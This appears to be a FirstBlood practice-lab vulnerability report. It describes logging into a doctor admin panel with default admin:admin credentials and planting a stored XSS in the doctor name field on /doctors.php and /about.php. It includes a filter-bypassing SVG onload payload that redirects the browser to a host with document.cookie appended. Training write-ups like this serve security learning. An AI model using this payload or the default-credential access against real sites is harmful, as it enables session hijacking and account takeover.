FirstBlood-#1124Stored XSS in the Doctor Name on /doctors.php as well as /about.php
This issue was discovered on FirstBlood v3



On 2022-12-08, mr_xhunt Level 8 reported:

Summary:

I was able to login using default credentials: admin:admin While modifying the name of the Doctor found there is XSS filter in the name parameter which checks for > tag but we can obfuscate by creating a payload without > tag and Succefully create Stored XSS against Authenticated as well as Non Authed users

Steps To Reprduce:

  1. You need to login to drpanel

  2. Now Modify and Doctor data and Intercept using burp

  3. Now Put the payload in the name parameter

  4. Now send the Request

  1. Now visit the endpoint: /doctors.php and /about.php, the XSS is executed and Succefully leaks the Cookie of the users

POC:

  1. /doctors.php

  1. /about.php

P1 CRITICAL

Endpoint: /doctors.php & /about.php

Parameter: name

Payload: "><svg onload=alert(document.location=`https://localhost/?${document.cookie}`)//


FirstBlood ID: 48
Vulnerability Type: Auth issues

The /drpanel/login.php endpoint contains weak credentials which allows users to access the admin panel (admin:admin)

FirstBlood ID: 56
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on the /about.php endpoint via a malicious doctors name

FirstBlood ID: 55
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on the /doctors.php endpoint via a malicious doctors name

Report Feedback

@zseano

Creator & Administrator


Congratulations, you were the SECOND user to discover stored XSS on about.php via the doctors name